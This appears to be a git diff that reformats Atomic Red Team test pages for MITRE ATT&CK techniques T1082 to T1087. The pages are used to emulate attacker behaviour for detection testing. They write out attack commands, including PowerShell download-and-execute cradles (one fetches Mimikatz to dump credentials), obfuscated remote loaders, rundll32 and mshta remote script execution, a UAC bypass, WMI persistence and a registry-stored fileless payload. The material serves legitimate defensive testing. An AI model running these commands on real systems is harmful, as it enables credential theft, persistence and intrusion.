## Atomic Test #4 - Linux VM Check via Hardware + Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. **Supported Platforms:** Linux - - - - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash cat /sys/class/dmi/id/bios_version | grep -i amazon @@ -145,25 +126,16 @@ sudo lspci | grep -i "vmware\|virtualbox" sudo lscpu | grep -i "Xen\|KVM\|Microsoft" ``` - - - - -

## Atomic Test #5 - Linux VM Check via Kernel Modules + Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. **Supported Platforms:** Linux - - - - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash sudo lsmod | grep -i "vboxsf\|vboxguest" @@ -173,81 +145,49 @@ sudo lsmod | grep -i "virtio_pci\|virtio_net" sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc" ``` - - - - -

## Atomic Test #6 - Hostname Discovery (Windows) + Identify system hostname for Windows. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd hostname ``` - - - - -

## Atomic Test #7 - Hostname Discovery + Identify system hostname for Linux and macOS systems. **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash hostname ``` - - - - -

## Atomic Test #8 - Windows MachineGUID Discovery + Identify the Windows MachineGUID value for a system. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1083.md b/Atomic_Threat_Coverage/Triggers/T1083.md index a7cd04eb..d703bc8c 100644 --- a/Atomic_Threat_Coverage/Triggers/T1083.md +++ b/Atomic_Threat_Coverage/Triggers/T1083.md @@ -1,14 +1,19 @@ # T1083 - File and Directory Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1083) +
Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. ### Windows -Example utilities used to obtain this information are dir and tree. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API. +Example utilities used to obtain this information are dir and tree. (Citation: Windows +Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows +API. ### Mac and Linux -In Mac and Linux, this kind of discovery is accomplished with the ls, find, and locate commands.
+In Mac and Linux, this kind of discovery is accomplished with the ls, find, and +locate commands. ## Atomic Tests @@ -20,21 +25,17 @@ In Mac and Linux, this kind of discovery is accomplished with the ls ## Atomic Test #1 - File and Directory Discovery (cmd.exe) -Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of + +Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder +and contain the output of all of the data discovery commands. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd dir /s c:\ >> %temp%\download @@ -46,25 +47,16 @@ dir "%userprofile%\Desktop\*.*" >> %temp%\download tree /F >> %temp%\download ``` - - - - -

## Atomic Test #2 - File and Directory Discovery (PowerShell) + Find or discover files on the file system. Upon execution, file and folder information will be displayed. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell ls -recurse @@ -72,15 +64,11 @@ get-childitem -recurse gci -recurse ``` - - - - -

## Atomic Test #3 - Nix File and Diectory Discovery + Find or discover files on the file system References: @@ -91,12 +79,7 @@ https://perishablepress.com/list-files-folders-recursively-terminal/ **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh ls -a > allcontents.txt @@ -108,25 +91,16 @@ locate * which sh ``` - - - - -

## Atomic Test #4 - Nix File and Directory Discovery 2 + Find or discover files on the file system **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt @@ -135,9 +109,4 @@ find . -type f -iname *.pdf > /tmp/loot.txt find . -type f -name ".*" ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1084.md b/Atomic_Threat_Coverage/Triggers/T1084.md index 9d6fd383..002fd3ef 100644 --- a/Atomic_Threat_Coverage/Triggers/T1084.md +++ b/Atomic_Threat_Coverage/Triggers/T1084.md @@ -1,15 +1,17 @@ # T1084 - Windows Management Instrumentation Event Subscription + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1084) +
Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)
## Atomic Tests - [Atomic Test #1 - Persistence via WMI Event Subscription](#atomic-test-1---persistence-via-wmi-event-subscription) -
## Atomic Test #1 - Persistence via WMI Event Subscription + Run from an administrator powershell window. After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. @@ -21,12 +23,7 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; @@ -47,6 +44,7 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa ``` #### Cleanup Commands: + ```powershell $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" @@ -56,8 +54,4 @@ $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1085.md b/Atomic_Threat_Coverage/Triggers/T1085.md index 79973256..4ea1cc28 100644 --- a/Atomic_Threat_Coverage/Triggers/T1085.md +++ b/Atomic_Threat_Coverage/Triggers/T1085.md @@ -1,10 +1,17 @@ # T1085 - Rundll32 + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1085) +
The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations. -Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) +Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll +functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes +rundll32.exe to execute. (Citation: Trend Micro CPL) -Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
+Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to +this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.] +example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is +Security Command Line Confusion) ## Atomic Tests @@ -20,114 +27,94 @@ Rundll32 can also been used to execute scripts such as JavaScript. This can be d - [Atomic Test #6 - Rundll32 setupapi.dll Execution](#atomic-test-6---rundll32-setupapidll-execution) -
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject + Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/src/T1085.sct| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); ``` - - - - -

## Atomic Test #2 - Rundll32 execute VBscript command + Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution calc.exe will be launched **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | Command for rundll32.exe to execute | string | calc.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) ``` - - - - -

## Atomic Test #3 - Rundll32 advpack.dll Execution + Test execution of a command using rundll32.exe with advpack.dll. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml Upon execution calc.exe will be launched **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085.inf| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" ``` - - -

## Atomic Test #4 - Rundll32 ieadvpack.dll Execution + Test execution of a command using rundll32.exe with ieadvpack.dll. Upon execution calc.exe will be launched @@ -135,126 +122,115 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/ **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085.inf| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" ``` - - -

## Atomic Test #5 - Rundll32 syssetup.dll Execution -Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened + +Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" +will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute} ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" ``` - - -

## Atomic Test #6 - Rundll32 setupapi.dll Execution -Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened + +Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" +will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute} ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1086.md b/Atomic_Threat_Coverage/Triggers/T1086.md index 1b033cff..46fd9e33 100644 --- a/Atomic_Threat_Coverage/Triggers/T1086.md +++ b/Atomic_Threat_Coverage/Triggers/T1086.md @@ -1,14 +1,22 @@ # T1086 - PowerShell + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1086) +
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. -PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. +PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in +memory without touching disk. Administrator permissions are required to use PowerShell to connect to remote systems. -A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack) +A number of PowerShell-based offensive testing tools are available, +including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. ( +Citation: Github PSAttack) -PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)
+PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces +to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common +Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: +Microsoft PSfromCsharp APR 2014) ## Atomic Tests @@ -38,85 +46,66 @@ PowerShell commands/scripts can also be executed without directly invoking the p - [Atomic Test #13 - NTFS Alternate Data Stream Access](#atomic-test-13---ntfs-alternate-data-stream-access) -
## Atomic Test #1 - Mimikatz + Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | mimurl | Mimikatz url | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" ``` - - - - -

## Atomic Test #2 - BloodHound + Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run, and then compress and store the data to the temp directory on the machine **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound ``` #### Cleanup Commands: + ```powershell Remove-Item $env:temp\*BloodHound.zip -Force ``` - - - -

## Atomic Test #3 - Obfuscation Tests + Different obfuscated methods to test Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) @@ -124,222 +113,160 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) ``` - - - - -

## Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys -Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. - -**Supported Platforms:** Windows - +Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and +input code, then mimikatz dump info will be displayed. +**Supported Platforms:** Windows - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr ``` - - - - -

## Atomic Test #5 - Invoke-AppPathBypass + Note: Windows 10 only Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ Upon execution windows backup and restore window will be opened **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'" ``` - - - - -

## Atomic Test #6 - Powershell MsXml COM object - no prompt + Provided by https://github.com/mgreen27/mgreen27.github.io Powershell MsXml COM object. Not proxy aware removing cache although does not appear to write to those locations **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" ``` - - - - -

## Atomic Test #7 - Powershell MsXml COM object - with prompt -Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. + +Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon +execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.i **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" ``` - - - - -

## Atomic Test #8 - Powershell XML requests + Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed. Provided by https://github.com/mgreen27/mgreen27.github.io **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX" ``` - - - - -

## Atomic Test #9 - Powershell invoke mshta.exe download -Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". + +Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display " +Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()" ``` - - - - -

## Atomic Test #10 - Powershell Invoke-DownloadCradle + Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts. **Supported Platforms:** Windows +#### Run it with these steps! - - -#### Run it with these steps! 1. Open Powershell_ise as a Privileged Account 2. Invoke-DownloadCradle.ps1 - - - - - -

## Atomic Test #11 - PowerShell Fileless Script Execution -Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that + +Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon +exection, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell # Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team"" @@ -348,70 +275,61 @@ iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Sof ``` #### Cleanup Commands: + ```powershell Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore ``` - - - -

## Atomic Test #12 - PowerShell Downgrade Attack -Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ - -**Supported Platforms:** Windows - - - +Attempts to run powershell commands in version +2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ -#### Attack Commands: Run with `powershell`! +**Supported Platforms:** Windows +#### Attack Commands: Run with `powershell`! ```powershell powershell.exe -version 2 -Command Write-Host $PSVersion ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: PowerShell version 2 must be installed + ##### Check Prereq Commands: + ```powershell if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell Write-Host Automated installer not implemented yet, please install PowerShell v2 manually ``` - - -

## Atomic Test #13 - NTFS Alternate Data Stream Access -Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. - -**Supported Platforms:** Windows - +Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data +Executed" will be displayed. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | ads_file | File created to store Alternate Stream Data | String | $env:TEMP\NTFS_ADS.txt| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand' @@ -420,24 +338,25 @@ Invoke-Expression $streamcommand ``` #### Cleanup Commands: + ```powershell Remove-Item #{ads_file} -Force -ErrorAction Ignore ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Homedrive must be an NTFS drive + ##### Check Prereq Commands: + ```powershell if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell Write-Host Prereq's for this test cannot be met automatically ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1087.md b/Atomic_Threat_Coverage/Triggers/T1087.md index e1bd20f9..c1992422 100644 --- a/Atomic_Threat_Coverage/Triggers/T1087.md +++ b/Atomic_Threat_Coverage/Triggers/T1087.md @@ -1,28 +1,43 @@ # T1087 - Account Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1087) +
Adversaries may attempt to get a listing of local system or domain accounts. ### Windows -Example commands that can acquire this information are net user, net group , and net localgroup using the [Net](https://attack.mitre.org/software/S0039) utility or through use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply. +Example commands that can acquire this information are net user, net group , +and net localgroup using the [Net](https://attack.mitre.org/software/S0039) utility or through +use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, +currently logged in user, or set of users that commonly uses a +system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply. ### Mac -On Mac, groups can be enumerated through the groups and id commands. In mac specifically, dscl . list /Groups and dscacheutil -q group can also be used to enumerate groups and users. +On Mac, groups can be enumerated through the groups and id commands. In mac +specifically, dscl . list /Groups and dscacheutil -q group can also be used to enumerate +groups and 